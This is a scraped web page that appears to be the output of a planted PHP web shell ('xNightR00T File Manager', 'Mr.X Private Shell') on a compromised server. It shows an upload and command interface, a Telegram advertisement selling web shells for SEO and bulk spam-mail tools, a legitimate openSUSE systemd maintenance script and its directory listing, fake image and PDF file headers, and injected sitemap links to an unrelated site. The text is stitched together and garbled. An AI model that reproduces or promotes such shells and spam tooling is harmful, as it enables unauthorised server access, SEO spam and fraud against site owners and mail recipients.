xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#! /bin/bash
#
# This is used to initially create /var/lib/machines subvolume in case
# the system we're running on is using BTRFS with the specific layout
# used by snapper to perform snapshots, rollbacks, etc...
#
# Unfortunately some distros (TW) already shipped versions with
# systemd creating a plain subvolume which breaks snapper.
#
# If /var/lib/machines is already populated then it's going to be
# pretty ugly to convert the old subvolume into a new one specially
# since it can be in use.
#
# Hopefully not a lot of users are using machinectl to import
# container/VM images. So in most of the cases this directory should
# be empty and we can then simple delete the subvolume and create a
# new one respecting the snapper layout.
#
# In the rare case where /var/lib/machines is populated, we will warn
# the user and let him fix it manually.
#
# In order to avoid ugly dependencies added in systemd package, this
# script should only be called during package updates when
# mksubvolume(8) is available. During installation, /var/lib/machines
# is supposed to be created by the installer now.
#
# See bsc#992573
#

warn() {
	echo >&2 "warning: $@"
}

is_btrfs_subvolume() {
	# On btrfs subvolumes always have the inode 256
	test $(stat --format=%i "$1") -eq 256
}

# This assumes the directory/subvol is emptied by the caller.
rm_subvolume_or_directory() {
	is_btrfs_subvolume "$1" && {
		btrfs subvolume delete "$1"
		return
	}
	rmdir "$1"
}

on_exit() {
	# Simply print a common error message in case something went
	# wrong.
	if test $? -ne 0; then
		warn "Please fix /var/lib/machines manually."
		# FIXME: point to a documentation explaining how to do
		# that.
		exit 1
	fi
}

#
# If there's already an entry in fstab for /var/lib/machines, it
# means that:
#
#   - the installer initialized /var/lib/machines correctly (default)
#   - we already fixed it
#   - the sysadmin added it manually
#
# In any cases we should exit.
#
# Note: we can't simply check if /var/lib/machines has been mounted
# because an update through a chroot might be in progress (see
# bsc#1030290).
#
if mount --fake /var/lib/machines 2>/dev/null; then
	exit
fi

#
# If something is already mounted don't try to fix anything, it's been
# done manually by the sysadmin.
#
if mountpoint -q /var/lib/machines; then
	exit
fi

#
# Let's try to figure out if the current filesystem uses a Snapper
# BTRFS specific layout. Note that TW uses a different layout than
# SLE...
#
# FIXME: not sure if it's correct, reliable or optimal.
#
case $(findmnt -nr -t btrfs -o FSROOT / 2>/dev/null) in
*.snapshots/*/snapshot*)
	;;
*)
	exit 0
esac

trap on_exit EXIT

if test -d /var/lib/machines; then
	#
	# Ok, we're on a system supporting rollbacks and
	# /var/lib/machines is not a subvolume remotely mounted so it
	# cannot be suitable for systems supporting rollback. Fix it.
	#
	echo "Making /var/lib/machines suitable for rollbacks..."

	type mksubvolume >/dev/null 2>&1 || {
		warn "mksubvolume(8) is not installed, aborting."
		exit 1
	}
	test "$(ls -A /var/lib/machines/)" && {
		warn "/var/lib/machines is not empty, aborting."
		exit 1
	}

	echo "Deleting empty /var/lib/machines directory/subvolume"
	rm_subvolume_or_directory /var/lib/machines || {
		warn "fail to delete /var/lib/machines"
		exit 1
	}
fi

# At this point /var/lib/machines shouldn't exist.
echo "Creating /var/lib/machines subvolume suitable for rollbacks."
mksubvolume /var/lib/machines

Filemanager

Name Type Size Permission Actions
boot Folder 0755
catalog Folder 0755
network Folder 0755
ntp-units.d Folder 0755
scripts Folder 0755
system Folder 0755
system-generators Folder 0755
system-preset Folder 0755
system-shutdown Folder 0755
system-sleep Folder 0755
user Folder 0755
user-generators Folder 0755
user-preset Folder 0755
fix-machines-subvol-for-rollbacks.sh File 3.36 KB 0755
import-pubring.gpg File 9.33 KB 0644
systemd File 1.54 MB 0755
systemd-ac-power File 22.12 KB 0755
systemd-activate File 70.27 KB 0755
systemd-backlight File 118.42 KB 0755
systemd-binfmt File 66.42 KB 0755
systemd-bootchart File 122.48 KB 0755
systemd-cgroups-agent File 38.27 KB 0755
systemd-coredump File 130.45 KB 0755
systemd-cryptsetup File 114.43 KB 0755
systemd-export File 138.42 KB 0755
systemd-fsck File 335.74 KB 0755
systemd-hibernate-resume File 46.27 KB 0755
systemd-hostnamed File 371.05 KB 0755
systemd-import File 158.43 KB 0755
systemd-importd File 391.74 KB 0755
systemd-initctl File 307.05 KB 0755
systemd-journald File 354.43 KB 0755
systemd-localed File 375.05 KB 0755
systemd-logind File 655.74 KB 0755
systemd-machined File 527.74 KB 0755
systemd-modules-load File 70.43 KB 0755
systemd-pull File 242.43 KB 0755
systemd-quotacheck File 42.34 KB 0755
systemd-random-seed File 46.27 KB 0755
systemd-remount-fs File 66.43 KB 0755
systemd-reply-password File 38.27 KB 0755
systemd-rfkill File 118.42 KB 0755
systemd-shutdown File 182.43 KB 0755
systemd-sleep File 90.42 KB 0755
systemd-socket-proxyd File 110.43 KB 0755
systemd-sysctl File 70.42 KB 0755
systemd-sysv-install File 987 B 0755
systemd-timedated File 371.77 KB 0755
systemd-timesyncd File 162.43 KB 0755
systemd-udevd File 482.48 KB 0755
systemd-update-done File 46.27 KB 0755
systemd-update-utmp File 311.06 KB 0755
systemd-user-sessions File 42.27 KB 0755
systemd-vconsole-setup File 62.34 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml